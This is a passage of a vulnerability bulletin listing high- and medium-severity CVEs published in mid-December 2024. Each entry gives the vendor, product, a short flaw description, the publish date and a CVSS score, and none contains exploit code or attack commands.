Saul Morales Pacheco–Banner System
Missing Authorization vulnerability in Saul Morales Pacheco Banner System allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Banner System: from n/a through 1.0.0.
2024-12-16
8.2
CVE-2024-54359

Schneider Electric–Harmony (Formerly Magelis) HMIST6, HMISTM6, HMIG3U, HMIG3X, HMISTO7 series with EcoStruxure Operator Terminal Expert runtime
CWE-1104: Use of Unmaintained Third-Party Components vulnerability exists that could cause complete control of the device when an authenticated user installs malicious code into HMI product.
2024-12-17
8.8
CVE-2024-11999

Sciener–TTLock App
A specially crafted message can be sent to the TTLock App that downgrades the encryption protocol used for communication, and can be utilized to compromise the lock, such as through revealing the unlockKey field.
2024-12-19
7.5
CVE-2023-7005

scriptsbundle–AdForest
The AdForest theme for WordPress is vulnerable to authentication bypass in all versions up to, and including, 5.1.6. This is due to the plugin not properly verifying a user’s identity prior to authenticating them through the sb_login_user_with_otp_fun() function. This makes it possible for unauthenticated attackers to log in as arbitrary users, including administrators.
2024-12-21
9.8
CVE-2024-11349

sebhildebrandt–systeminformation
systeminformation is a System and OS information library for node.js. In affected versions SSIDs are not sanitized when before they are passed as a parameter to cmd.exe in the `getWindowsIEEE8021x` function. This means that malicious content in the SSID can be executed as OS commands. This vulnerability may enable an attacker, depending on how the package is used, to perform remote code execution or local privilege escalation. This issue has been addressed in version 5.23.7 and all users are advised to upgrade. There are no known workarounds for this vulnerability.
2024-12-20
7.8
CVE-2024-56334

SeedProd LLC–SeedProd Pro
Unrestricted Upload of File with Dangerous Type vulnerability in SeedProd LLC SeedProd Pro allows Upload a Web Shell to a Web Server.This issue affects SeedProd Pro: from n/a through 6.18.10.
2024-12-16
9.1
CVE-2024-54285

SeedProd LLC–SeedProd Pro
Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in SeedProd LLC SeedProd Pro allows SQL Injection.This issue affects SeedProd Pro: from n/a through 6.18.10.
2024-12-16
7.6
CVE-2024-54283

serviceonline–Service
Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in serviceonline Service allows Blind SQL Injection.This issue affects Service: from n/a through 1.0.4.
2024-12-16
8.5
CVE-2024-55986

Shambhu Prasad Patnaik–WP Flipkart Importer
Cross-Site Request Forgery (CSRF) vulnerability in Shambhu Prasad Patnaik WP Flipkart Importer allows Stored XSS.This issue affects WP Flipkart Importer: from n/a through 1.4.
2024-12-16
7.1
CVE-2024-54432

Sheikh Heera–WP Fiddle
Cross-Site Request Forgery (CSRF) vulnerability in Sheikh Heera WP Fiddle allows Stored XSS.This issue affects WP Fiddle: from n/a through 1.0.
2024-12-16
7.1
CVE-2024-54393

shinephp–User Role Editor
The User Role Editor plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.64.3. This is due to missing or incorrect nonce validation on the update_roles() function. This makes it possible for unauthenticated attackers to add or remove roles for arbitrary users, including escalating their privileges to administrator, via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
2024-12-17
8.8
CVE-2024-12293

ShineTheme–Travel Booking WordPress Theme
The Travel Booking WordPress Theme theme for WordPress is vulnerable to blind time-based SQL Injection via the ‘order_id’ parameter in all versions up to, and including, 3.1.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
2024-12-18
7.5
CVE-2024-11912

Siemens–Opcenter Execution Foundation
A vulnerability has been identified in Opcenter Execution Foundation (All versions), Opcenter Intelligence (All versions), Opcenter Quality (All versions), Opcenter RDL (All versions), SIMATIC PCS neo V4.0 (All versions), SIMATIC PCS neo V4.1 (All versions), SIMATIC PCS neo V5.0 (All versions < V5.0 Update 1), SINEC NMS (All versions if operated in conjunction with UMC < V2.15), Totally Integrated Automation Portal (TIA Portal) V16 (All versions), Totally Integrated Automation Portal (TIA Portal) V17 (All versions), Totally Integrated Automation Portal (TIA Portal) V18 (All versions), Totally Integrated Automation Portal (TIA Portal) V19 (All versions). Affected products contain a heap-based buffer overflow vulnerability in the integrated UMC component. This could allow an unauthenticated remote attacker to execute arbitrary code. 2024-12-16 9.8 CVE-2024-49775 Sierra Wireless--AirVantage, AirVantage-Capable Devices: All Sierra Wireless devices. The AirVantage platform is vulnerable to an unauthorized attacker registering previously unregistered devices on the AirVantage platform when the owner has not disabled the AirVantage Management Service on the devices or registered the device. This could enable an attacker to configure, manage, and execute AT commands on an unsuspecting user's devices. 2024-12-21 8.1 CVE-2023-31279 Simple Booking--Simple Booking Widget Cross-Site Request Forgery (CSRF) vulnerability in Simple Booking Simple Booking Widget allows Stored XSS.This issue affects Simple Booking Widget: from n/a through 1.1. 2024-12-16 7.1 CVE-2024-54433 smsaexpress--SMSA Shipping(official) The SMSA Shipping(official) plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the smsa_delete_label() function in all versions up to, and including, 2.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php). 2024-12-21 8.8 CVE-2024-12066 Soflyy--WP All Import Pro The WP All Import Pro plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 4.9.3 due to missing SSRF protection on the pmxi_curl_download function. This makes it possible for authenticated attackers, with Administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. On cloud platforms, it might allow attackers to read the Instance metadata. 2024-12-17 7.6 CVE-2024-9624 SoftLab--Radio Player Server-Side Request Forgery (SSRF) vulnerability in SoftLab Radio Player allows Server Side Request Forgery.This issue affects Radio Player: from n/a through 2.0.82. 2024-12-16 7.2 CVE-2024-54385 Sophos--Sophos Firewall A pre-auth SQL injection vulnerability in the email protection feature of Sophos Firewall versions older than 21.0 MR1 (21.0.1) allows access to the reporting database and can lead to remote code execution if a specific configuration of Secure PDF eXchange (SPX) is enabled in combination with the firewall running in High Availability (HA) mode. 2024-12-19 9.8 CVE-2024-12727 Sophos--Sophos Firewall A weak credentials vulnerability potentially allows privileged system access via SSH to Sophos Firewall older than version 20.0 MR3 (20.0.3). 2024-12-19 9.8 CVE-2024-12728 Sophos--Sophos Firewall A post-auth code injection vulnerability in the User Portal allows authenticated users to execute code remotely in Sophos Firewall older than version 21.0 MR1 (21.0.1). 2024-12-19 8.8 CVE-2024-12729 Sourov Amin--Insertify Cross-Site Request Forgery (CSRF) vulnerability in Sourov Amin Insertify allows Code Injection.This issue affects Insertify: from n/a through 1.1.4. 2024-12-16 9.6 CVE-2024-54372 Spartac--Feedpress Generator Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Spartac Feedpress Generator allows Reflected XSS.This issue affects Feedpress Generator: from n/a through 1.2.1. 2024-12-16 7.1 CVE-2024-54364 Spider-themes--EazyDocs Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Spider-themes EazyDocs.This issue affects EazyDocs: from n/a through 2.5.5. 2024-12-16 7.5 CVE-2024-54376 spreadr--Spreadr Woocommerce Missing Authorization vulnerability in spreadr Spreadr Woocommerce allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Spreadr Woocommerce: from n/a through 1.0.4. 2024-12-18 7.5 CVE-2024-56008 Stefan Brandt--Display Future Posts Cross-Site Request Forgery (CSRF) vulnerability in Stefan Brandt Display Future Posts allows Stored XSS.This issue affects Display Future Posts: from n/a through 0.2.3. 2024-12-16 7.1 CVE-2024-54413 Straightvisions GmbH--SV100 Companion Incorrect Privilege Assignment vulnerability in Straightvisions GmbH SV100 Companion allows Privilege Escalation.This issue affects SV100 Companion: from n/a through 2.0.02. 2024-12-16 9.8 CVE-2024-54229 SuitePlugins--Video & Photo Gallery for Ultimate Member Unrestricted Upload of File with Dangerous Type vulnerability in SuitePlugins Video & Photo Gallery for Ultimate Member allows Upload a Web Shell to a Web Server.This issue affects Video & Photo Gallery for Ultimate Member: from n/a through 1.1.0. 2024-12-16 9.9 CVE-2024-54370 SUNNET Technology Co., Ltd.--Corporate Training Management System A unrestricted upload of file with dangerous type vulnerability in epaper draft function in Corporate Training Management System before 10.13 allows remote authenticated users to bypass file upload restrictions and perform arbitrary system commands with SYSTEM privilege via a crafted ZIP file. 2024-12-19 8.8 CVE-2024-11984 susheelhbti--Saksh Escrow System Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in susheelhbti Saksh Escrow System allows SQL Injection.This issue affects Saksh Escrow System: from n/a through 2.4. 2024-12-18 8.5 CVE-2024-55984 sweetdaisy86--CRM WordPress Plugin RepairBuddy The CRM WordPress Plugin - RepairBuddy plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.8120. This is due to the plugin not properly validating a user's identity prior to updating their email through the wc_update_user_data AJAX action. This makes it possible for authenticated attackers, with subscriber-level access and above, to change arbitrary user's email addresses, including administrators, and leverage that to reset the user's password and gain access to their account. 2024-12-18 8.8 CVE-2024-12259 Synology--Media Server Authorization bypass through user-controlled key vulnerability in streaming service in Synology Media Server before 1.4-2680, 2.0.5-3152 and 2.2.0-3325 allows remote attackers to read specific files via unspecified vectors. 2024-12-18 7.5 CVE-2024-4464 telerik -- ui_for_wpf In Progress Telerik UI for WPF versions prior to 2024 Q4 (2024.4.1213), a code execution attack is possible through an insecure deserialization vulnerability. 2024-12-16 8.4 CVE-2024-10095 theDotstore--Advance Menu Manager Missing Authorization vulnerability in theDotstore Advance Menu Manager.This issue affects Advance Menu Manager: from n/a through 3.1.1. 2024-12-18 7.1 CVE-2024-54381 ThemeHunk--Zita Site Builder Missing Authorization vulnerability in ThemeHunk Zita Site Builder allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Zita Site Builder: from n/a through 1.0.2. 2024-12-16 9.1 CVE-2024-54369 Thomas Hoefter--Onlywire Multi Autosubmitter Cross-Site Request Forgery (CSRF) vulnerability in Thomas Hoefter Onlywire Multi Autosubmitter allows Stored XSS.This issue affects Onlywire Multi Autosubmitter: from n/a through 1.2.4. 2024-12-16 7.1 CVE-2024-54435 ThreatQuotient--ThreatQ In ThreatQuotient ThreatQ before 5.29.3, authenticated users are able to execute arbitrary commands by sending a crafted request to an API endpoint. 2024-12-18 8.8 CVE-2024-39703 Tibbo--AggreGate Network Manager There is an unrestricted file upload vulnerability where it is possible for an authenticated user (low privileged) to upload an jsp shell and execute code with the privileges of user running the web server. 2024-12-19 8.8 CVE-2024-12700 Toby Cox--SOPA Blackout Cross-Site Request Forgery (CSRF) vulnerability in Toby Cox SOPA Blackout allows Stored XSS.This issue affects SOPA Blackout: from n/a through 1.4. 2024-12-16 7.1 CVE-2024-54410 Tom Royal--Stop Registration Spam Cross-Site Request Forgery (CSRF) vulnerability in Tom Royal Stop Registration Spam allows Stored XSS.This issue affects Stop Registration Spam: from n/a through 1.23. 2024-12-16 7.1 CVE-2024-56017 Turcu Ciprian--Advanced Fancybox Cross-Site Request Forgery (CSRF) vulnerability in Turcu Ciprian Advanced Fancybox allows Stored XSS.This issue affects Advanced Fancybox: from n/a through 1.1.1. 2024-12-16 7.1 CVE-2024-54401 Velocidex--WinPmem Velocidex WinPmem versions below 4.1 suffer from an Out of Bounds Write vulnerability.Â By using an IO Control, a user space program can trick the driver into writing a 0 into any chosen memory location. In conjunction with information leakage from the WinPmem driver, attackers can discover the location in memory for the g_CiOptions global symbol. This can be leveraged to disable signed driver enforcement on the target system - allowing attackers to load unsigned drivers. 2024-12-16 8.2 CVE-2024-12668 Velocidex--WinPmem Velocidex WinPmem versions 4.1 and below suffer from an Improper Input Validation vulnerability whereby an attacker with admin access can trigger a BSODÂ with a parallel thread changing the memory's access right under the control of the user-mode application. This is due to verification only being performed at the beginning of the routine allowing theÂ userspace to change page permissions half way through the routine.Â A valid workaround is a rule to detect unauthorized loading of winpmem outside incident response operations. 2024-12-16 7.3 CVE-2024-10972 vercel--next.js Next.js is a React framework for building full-stack web applications. In affected versions if a Next.js application is performing authorization in middleware based on pathname, it was possible for this authorization to be bypassed for pages directly under the application's root directory. For example: * [Not affected] `https://example.com/` * [Affected] `https://example.com/foo` * [Not affected] `https://example.com/foo/bar`. This issue is patched in Next.js `14.2.15` and later. If your Next.js application is hosted on Vercel, this vulnerability has been automatically mitigated, regardless of Next.js version. There are no official workarounds for this vulnerability. 2024-12-17 7.5 CVE-2024-51479 VibeThemes--WPLMS Unrestricted Upload of File with Dangerous Type vulnerability in VibeThemes WPLMS allows Upload a Web Shell to a Web Server.This issue affects WPLMS: from n/a before 1.9.9.5.3. 2024-12-18 9.9 CVE-2024-56050 VibeThemes--WPLMS Unrestricted Upload of File with Dangerous Type vulnerability in VibeThemes WPLMS allows Upload a Web Shell to a Web Server.This issue affects WPLMS: from n/a before 1.9.9.5.2. 2024-12-18 9.9 CVE-2024-56052 VibeThemes--WPLMS Unrestricted Upload of File with Dangerous Type vulnerability in VibeThemes WPLMS allows Upload a Web Shell to a Web Server.This issue affects WPLMS: from n/a before 1.9.9.5.2. 2024-12-18 9.1 CVE-2024-56054 VibeThemes--WPLMS Unrestricted Upload of File with Dangerous Type vulnerability in VibeThemes WPLMS allows Upload a Web Shell to a Web Server.This issue affects WPLMS: from n/a before 1.9.9.5.2. 2024-12-18 9.9 CVE-2024-56057 VibeThemes--WPLMS Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in VibeThemes WPLMS allows SQL Injection.This issue affects WPLMS: from n/a before 1.9.9.5.3. 2024-12-18 8.5 CVE-2024-56047 VibeThemes--WPLMS Missing Authorization vulnerability in VibeThemes WPLMS allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects WPLMS: from n/a through 1.9.9. 2024-12-18 8.8 CVE-2024-56048 VibeThemes--WPLMS Path Traversal: '.../...//' vulnerability in VibeThemes WPLMS allows Path Traversal.This issue affects WPLMS: from n/a before 1.9.9.5.2. 2024-12-18 8.5 CVE-2024-56049 VibeThemes--WPLMS Improper Control of Generation of Code ('Code Injection') vulnerability in VibeThemes WPLMS allows Code Injection.This issue affects WPLMS: from n/a before 1.9.9.5. 2024-12-18 8.5 CVE-2024-56051 VibeThemes--WPLMS Path Traversal: '.../...//' vulnerability in VibeThemes WPLMS allows Path Traversal.This issue affects WPLMS: from n/a before 1.9.9.5.2. 2024-12-18 8.5 CVE-2024-56055 VibeThemes--WPLMS Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in VibeThemes WPLMS allows SQL Injection.This issue affects WPLMS: from n/a before 1.9.9.5.3. 2024-12-18 7.6 CVE-2024-56053 vivo--ABE Due to the flaws in the verification of input parameters, the attacker can input carefully constructed commands to make the ABE service execute some commands with root privilege. 2024-12-17 7 CVE-2020-12487 vivo--Permission manager module Locally installed application can bypass the permission check and perform system operations that require permission. 2024-12-17 7.9 CVE-2021-26280 WalletStation.com--Code Generator Pro Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WalletStation.com Code Generator Pro allows SQL Injection.This issue affects Code Generator Pro: from n/a through 1.2. 2024-12-16 9.3 CVE-2024-55978 Web solution soft--Mandrill WP Cross-Site Request Forgery (CSRF) vulnerability in Web solution soft Mandrill WP allows Stored XSS.This issue affects Mandrill WP: from n/a through 1.0.5. 2024-12-16 7.1 CVE-2024-54394 webbuilder143--Custom Product Tabs For WooCommerce The Custom Product Tabs For WooCommerce plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.2.4 via deserialization of untrusted input from the 'wb_custom_tabs' parameter. This makes it possible for authenticated attackers, with Shop Manager-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. 2024-12-21 7.2 CVE-2024-12721 Webriderz--Wr Age Verification Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Webriderz Wr Age Verification allows SQL Injection.This issue affects Wr Age Verification: from n/a through 2.0.0. 2024-12-16 9.3 CVE-2024-55980 Webriderz--Wr Age Verification Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Webriderz Wr Age Verification allows SQL Injection.This issue affects Wr Age Verification: from n/a through 2.0.0. 2024-12-16 8.5 CVE-2024-55979 WofficeIO--Woffice Authentication Bypass Using an Alternate Path or Channel vulnerability in WofficeIO Woffice allows Authentication Bypass.This issue affects Woffice: from n/a through 5.4.14. 2024-12-16 9.8 CVE-2024-43234 woodruffw--pyrage pyrage is a set of Python bindings for the rage file encryption library (age in Rust). `pyrage` uses the Rust `age` crate for its underlying operations, and `age` is vulnerable to GHSA-4fg7-vxc8-qx5w. All details of GHSA-4fg7-vxc8-qx5w are relevant to `pyrage` for the versions specified in this advisory. See GHSA-4fg7-vxc8-qx5w for full details. Versions of `pyrage` before 1.2.0 lack plugin support and are therefore **not affected**. An equivalent issue was fixed in [the reference Go implementation of age](https://github.com/FiloSottile/age), see advisory GHSA-32gq-x56h-299c. This issue has been addressed in version 1.2.3 and all users are advised to update. There are no known workarounds for this vulnerability. 2024-12-19 9.8 CVE-2024-56327 Wovax, LLC.--Wovax IDX Authentication Bypass Using an Alternate Path or Channel vulnerability in Wovax, LLC. Wovax IDX allows Authentication Bypass.This issue affects Wovax IDX: from n/a through 1.2.2. 2024-12-16 8.8 CVE-2024-56013 wpclever--WPC Shop as a Customer for WooCommerce The WPC Shop as a Customer for WooCommerce plugin for WordPress is vulnerable to account takeover and privilege escalation in all versions up to, and including, 1.2.8. This is due to the 'generate_key' function not producing a sufficiently random value. This makes it possible for authenticated attackers, with Subscriber-level access and above, to log in as site administrators, granted they have triggered the ajax_login() function which generates a unique key that can be used to log in. 2024-12-18 8.1 CVE-2024-12432 WPFactory--WP Currency Exchange Rates Cross-Site Request Forgery (CSRF) vulnerability in WPFactory WP Currency Exchange Rates allows Stored XSS.This issue affects WP Currency Exchange Rates: from n/a through 1.2.0. 2024-12-16 7.1 CVE-2024-54332 WPGear--Hack-Info Cross-Site Request Forgery (CSRF) vulnerability in WPGear Hack-Info allows Stored XSS.This issue affects Hack-Info: from n/a through 3.17. 2024-12-16 7.1 CVE-2024-54353 WPNERD--WP-NERD Toolkit Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in WPNERD WP-NERD Toolkit.This issue affects WP-NERD Toolkit: from n/a through 1.1. 2024-12-16 7.5 CVE-2024-54279 WPTooling--Image Mapper Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPTooling Image Mapper allows Reflected XSS.This issue affects Image Mapper: from n/a through 0.2.5.3. 2024-12-18 7.1 CVE-2024-56016 wpweb--WooCommerce PDF Vouchers Incorrect Privilege Assignment vulnerability in wpweb WooCommerce PDF Vouchers allows Privilege Escalation.This issue affects WooCommerce PDF Vouchers: from n/a before 4.9.9. 2024-12-18 9.8 CVE-2024-54383 X1a0He--Adobe Downloader A vulnerability, which was classified as critical, was found in X1a0He Adobe Downloader up to 1.3.1 on macOS. Affected is the function shouldAcceptNewConnection of the file com.x1a0he.macOS.Adobe-Downloader.helper of the component XPC Service. The manipulation leads to improper privilege management. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. This product is not affiliated with the company Adobe. 2024-12-19 7.8 CVE-2024-12786 xmidt-org--cjwt cjwt is a C JSON Web Token (JWT) Implementation. Algorithm confusion occurs when a system improperly verifies the type of signature used, allowing attackers to exploit the lack of distinction between signing methods. If the system doesn't differentiate between an HMAC signed token and an RS/EC/PS signed token during verification, it becomes vulnerable to this kind of attack. For instance, an attacker could craft a token with the alg field set to "HS256" while the server expects an asymmetric algorithm like "RS256". The server might mistakenly use the wrong verification method, such as using a public key as the HMAC secret, leading to unauthorised access. For RSA, the key can be computed from a few signatures. For Elliptic Curve (EC), two potential keys can be recovered from one signature. This can be used to bypass the signature mechanism if an application relies on asymmetrically signed tokens. This issue has been addressed in version 2.3.0 and all users are advised to upgrade. There are no known workarounds for this vulnerability. 2024-12-19 9.1 CVE-2024-54150 ydesignservices--YDS Support Ticket System Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ydesignservices YDS Support Ticket System allows SQL Injection.This issue affects YDS Support Ticket System: from n/a through 1.0. 2024-12-18 8.5 CVE-2024-55985 zephyrproject-rtos--Zephyr No proper validation of the length of user input in olcp_ind_handler in zephyr/subsys/bluetooth/services/ots/ots_client.c. 2024-12-16 7.5 CVE-2024-8798 Back to top Medium Vulnerabilities PrimaryVendor -- Product Description Published CVSS Score Source Info n/a--n/a Missing Authorization vulnerability in allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects : from n/a through 2.0.5. 2024-12-16 4.3 CVE-2024-55994 aasthasolutions--Particle Background The Particle Background plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'particleground' shortcode in all versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2024-12-20 6.4 CVE-2024-11775 Adobe--Acrobat Reader Acrobat Reader DC version 22.001.20085 (and earlier), 20.005.3031x (and earlier) and 17.012.30205 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2024-12-19 5.5 CVE-2022-44515 Adobe--Acrobat Reader Acrobat Reader DC version 22.001.20085 (and earlier), 20.005.3031x (and earlier) and 17.012.30205 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2024-12-19 5.5 CVE-2022-44516 Adobe--Acrobat Reader Acrobat Reader DC version 22.001.20085 (and earlier), 20.005.3031x (and earlier) and 17.012.30205 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2024-12-19 5.5 CVE-2022-44517 Adobe--Acrobat Reader Acrobat Reader DC version 22.001.20085 (and earlier), 20.005.3031x (and earlier) and 17.012.30205 (and earlier) are affected by a use-after-free vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2024-12-19 5.5 CVE-2022-44519 Adobe--Acrobat Reader Adobe Acrobat Reader versions 22.003.20282 (and earlier), 22.003.20281 (and earlier) and 20.005.30418 (and earlier) are affected by a NULL Pointer Dereference vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2024-12-19 5.5 CVE-2023-21586 Agency Dominion--Fusion Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Agency Dominion Fusion allows Stored XSS.This issue affects Fusion: from n/a through 1.6.1. 2024-12-19 6.5 CVE-2024-37962 Aiven-Open--pghoard pghoard is a PostgreSQL backup daemon and restore tooling that stores backup data in cloud object stores. A vulnerability has been discovered that could allow an attacker to acquire disk access with privileges equivalent to those of pghoard, allowing for unintended path traversal. Depending on the permissions/privileges assigned to pghoard, this could allow disclosure of sensitive information. This issue has been addressed in releases after 2.2.2a. Users are advised to upgrade. There are no known workarounds for this vulnerability. 2024-12-17 6.5 CVE-2024-56142 aklaren--ScanCircle The ScanCircle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'scancircle' shortcode in all versions up to, and including, 2.9.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2024-12-18 6.4 CVE-2024-11439 Alex W Fowler--Easy Site Importer Missing Authorization vulnerability in Alex W Fowler Easy Site Importer allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Easy Site Importer: from n/a through 1.0.1. 2024-12-16 5.4 CVE-2024-56004 amitwpdeveloper--WooCommerce Additional Fees On Checkout (Free) The WooCommerce Additional Fees On Checkout (Free) plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'number' parameter in all versions up to, and including, 1.4.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. 2024-12-17 6.1 CVE-2024-12395 Apache Software Foundation--Apache Kafka Incorrect Implementation of Authentication Algorithm in Apache Kafka's SCRAM implementation. Issue Summary: Apache Kafka's implementation of the Salted Challenge Response Authentication Mechanism (SCRAM) did not fully adhere to the requirements of RFC 5802 [1]. Specifically, as per RFC 5802, the server must verify that the nonce sent by the client in the second message matches the nonce sent by the server in its first message. However, Kafka's SCRAM implementation did not perform this validation. Impact: This vulnerability is exploitable only when an attacker has plaintext access to the SCRAM authentication exchange. However, the usage of SCRAM over plaintext is strongly discouraged as it is considered an insecure practice [2]. Apache Kafka recommends deploying SCRAM exclusively with TLS encryption to protect SCRAM exchanges from interception [3]. Deployments using SCRAM with TLS are not affected by this issue. How to Detect If You Are Impacted: If your deployment uses SCRAM authentication over plaintext communication channels (without TLS encryption), you are likely impacted. To check if TLS is enabled, review your server.properties configuration file for listeners property. If you have SASL_PLAINTEXT in the listeners, then you are likely impacted. Fix Details: The issue has been addressed by introducing nonce verification in the final message of the SCRAM authentication exchange to ensure compliance with RFC 5802. Affected Versions: Apache Kafka versions 0.10.2.0 through 3.9.0, excluding the fixed versions below. Fixed Versions: 3.9.0 3.8.1 3.7.2 Users are advised to upgrade to 3.7.2 or later to mitigate this issue. Recommendations for Mitigation: Users unable to upgrade to the fixed versions can mitigate the issue by: - Using TLS with SCRAM Authentication: Always deploy SCRAM over TLS to encrypt authentication exchanges and protect against interception. - Considering Alternative Authentication Mechanisms: Evaluate alternative authentication mechanisms, such as PLAIN, Kerberos or OAuth with TLS, which provide additional layers of security. 2024-12-18 5.3 CVE-2024-56128 Apache Software Foundation--Apache Tomcat Uncontrolled Resource Consumption vulnerability in the examples web application provided with Apache Tomcat leads to denial of service. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.1, from 10.1.0-M1 through 10.1.33, from 9.0.0.M1 through 9.9.97. Users are recommended to upgrade to version 11.0.2, 10.1.34 or 9.0.98, which fixes the issue. 2024-12-17 5.3 CVE-2024-54677 Apple--macOS A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Sequoia 15.1. An app may be able to access sensitive user data. 2024-12-20 5.5 CVE-2024-44292 Apple--macOS A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Sequoia 15.1. A user may be able to view sensitive user information. 2024-12-20 5.5 CVE-2024-44293 Apple--macOS A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Sequoia 15.1. An app may be able to access information about a user's contacts. 2024-12-20 5.5 CVE-2024-44298 arothman--PCRecruiter Extensions The PCRecruiter Extensions plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'PCRecruiter' shortcode in all versions up to, and including, 1.4.10 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2024-12-20 6.4 CVE-2024-11776 averta--Shortcodes and extra features for Phlox theme The Shortcodes and extra features for Phlox theme plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Staff widget in all versions up to, and including, 2.16.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2024-12-21 6.4 CVE-2024-12588 averta--Shortcodes and extra features for Phlox theme The Shortcodes and extra features for Phlox theme plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's aux_contact_box and aux_gmaps shortcodes in all versions up to, and including, 2.16.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2024-12-21 6.4 CVE-2024-9545 Bastien Ho--EELV Newsletter Cross-Site Request Forgery (CSRF) vulnerability in Bastien Ho EELV Newsletter allows Cross Site Request Forgery.This issue affects EELV Newsletter: from n/a through 4.8.2. 2024-12-16 5.4 CVE-2024-54430 bdthemes--Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid, Carousel and Remote Arrows) The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid, Carousel and Remote Arrows) plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the get_layouts() function in all versions up to, and including, 5.10.12. This makes it possible for authenticated attackers, with Subscriber-level access and above, to obtain a detailed listing of layout templates. 2024-12-22 4.3 CVE-2024-11852 Beat Kueffer--Termin-Kalender Missing Authorization vulnerability in Beat Kueffer Termin-Kalender allows Stored XSS.This issue affects Termin-Kalender: from n/a through 0.99.47. 2024-12-16 6.5 CVE-2024-54354 BeyondTrust--Remote Support(RS) & Privileged Remote Access(PRA) A vulnerability has been discovered in Privileged Remote Access (PRA) and Remote Support (RS) which can allow an attacker with existing administrative privileges to inject commands and run as a site user. 2024-12-18 6.6 CVE-2024-12686 BoldThemes--Bold Page Builder Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in BoldThemes Bold Page Builder allows Path Traversal.This issue affects Bold Page Builder: from n/a through 5.1.5. 2024-12-16 4.9 CVE-2024-54382 bplugins--Button Block Get fully customizable & multi-functional buttons The Button Block - Get fully customizable & multi-functional buttons plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.1.5 